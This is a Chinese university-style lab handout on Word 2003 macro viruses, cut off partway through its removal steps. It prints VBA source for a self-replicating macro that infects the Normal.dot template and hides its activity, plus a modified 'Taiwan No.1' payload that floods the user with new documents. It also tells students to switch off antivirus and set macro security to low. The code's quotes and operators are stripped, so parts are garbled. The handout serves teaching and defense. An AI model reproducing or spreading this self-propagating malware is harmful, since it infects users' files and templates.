宏病毒实验.doc

Word宏病毒实验 【实验目的】（1） 演示宏的编写（2） 说明宏的原理及其安全漏洞和缺陷（3） 理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识【实验环境】（1） Windows系列操作系统（2） Word 2003应用程序【实验步骤】准备工作（1）软件设置：关闭杀毒软件的自动防护功能。（2）打开Word 2003，在工具-宏-安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问。自我复制功能演示（1） 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具宏Visual Basic宏编辑器），在左侧的project-Microsoft Word对象-ThisDocument中输入源代码（macro_1.txt），保存。Micro-VirusSub Document_Open()On Error Resume Next进行必要的自我保护，高明的病毒编写者其自我保护将做的非常好，可以使word的一些工具栏失效，例如，将工具菜单中的宏选项屏蔽，也可以修改注册表以达到很好的隐藏效果。本例中只是屏蔽状态栏，以免显示宏的运行状态，并且修改公共模板时自动保存，不会给用户提示。Application.DisplayStatusBar = FalseOptions.SaveNormalPrompt = False得到当前文档的代码对象和公共模板的代码对象Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd If检查模板是否已经感染病毒，如果没有，则复制宏病毒代码到模板，并且修改函数名With Host If .Lines(1.1) Micro-Virus Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode.ReplaceLine 2, Sub Document_Close()If ThisDocument = nomaltemplate Then.ReplaceLine 2, Sub Document_Open() ActiveDocument.SaveAs ActiveDocument.FullName End If End IfEnd With执行恶意代码MsgBox MicroVirus by Content Security LabEnd Sub（2） 此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open）。（3） 此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。类台湾1号病毒演示（1） 对前面的恶意代码稍加修改，使其具有一定的破坏性（2） 这里以著名宏病毒“台湾1号”的恶意代码部分为基础，为使其在word2003版本中运行，且降低破坏性，对源代码作适当修改。源码在 macro_2.txtmoonlightDim nm(4)Sub Document_Open()DisableInput 1Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModuleSet host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate Then Set host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd IfWith hostIf .Lines(1, 1) moonlight Then .DeleteLines 1, .CountOfLines.InsertLines 1, ourcodemodule.Lines(1, 100).ReplaceLine 3, Sub Document_Close() If ThisDocument = NormalTemplate Then .ReplaceLine 3, Sub Document_Open() ActiveDocument.SaveAs ActiveDocument.FullName End If End IfEnd WithCount = 0If Day(Now() = 1 Thentry: On Error GoTo try test = -1 con = 1 tog$ = i = 0 While test = -1 For i = 0 To 4 nm(i) = Int(Rnd() * 10) con = con * nm(i) If i = 4 Then tog$ = tog$ + Str$(nm(4) + =? GoTo beg End If tog$ = tog$ + Str$(nm(i) + * Next ibeg: Beep ans$ = InputBox$(今天是 + Date$ + ,跟你玩一个心算游戏 + Chr$(13) + 若你答错，只好接受震撼教育. + Chr$(13) + tog$, 台湾NO.1 Macro Virus) If RTrim$(LTrim$(ans$) = LTrim$(Str$(con) Then Documents.Add Selection.Paragraphs.Alignment = wdAlignParagraphCenter Beep With Selection.Font .Name = 细明体 .Size = 16 .Bold = 1 .Underline = 1 End With Selection.InsertAfter Text:=何谓宏病毒 Selection.InsertParagraphAfter Beep Selection.InsertAfter Text:=答案： Selection.Font.Italic = 1 Selection.InsertAfter Text:=我就是. Selection.InsertParagraphAfter Selection.InsertParagraphAfter Selection.Font.Italic = 0 Beep Selection.InsertAfter Text:=如何预防宏病毒 Selection.InsertParagraphAfter Beep Selection.InsertAfter Text:=答案： Selection.Font.Italic = 1 Selection.InsertAfter Text:=不要看我. GoTo out Else Count = Count + 1 For j = 1 To 20 Beep Documents.Add Next j Selection.Paragraphs.Alignment = wdAlignParagraphCenter Selection.InsertAfter Text:=宏病毒 If Count = 2 Then GoTo out GoTo try End IfWendEnd Ifout:End Sub（3） 该病毒的效果如下：当打开被感染的word文档时，首先进行自我复制，感染word模板，然后检查日期，看是否是1日（即在每月的1日会发作），然后跳出一个对话框，要求用户进行一次心算游戏，这里只用四个小于10的数相乘，如果用户的计算正确，那么就会新建一个文档，跳出如下字幕：“何谓宏病毒，答案：我就是.；如何预防宏病毒，答案：不要看我.”。如果计算错误，新建20个写有“宏病毒”字样的word文档，然后再一次进行心算游戏，总共进行3次，然后跳出程序。关闭文档的时候也会执行同样的询问。清除宏病毒对每一个受感染的word文档进行如下操作：（1） 打开受感染的word文档，进入宏编辑环境（Alt+F11），打开Normal-Microsoft Word对象-This Document，清除其中的病毒代码（只要删除所有内容即可）。（2） 然后打开Project-Microsoft Word-This Document，清除其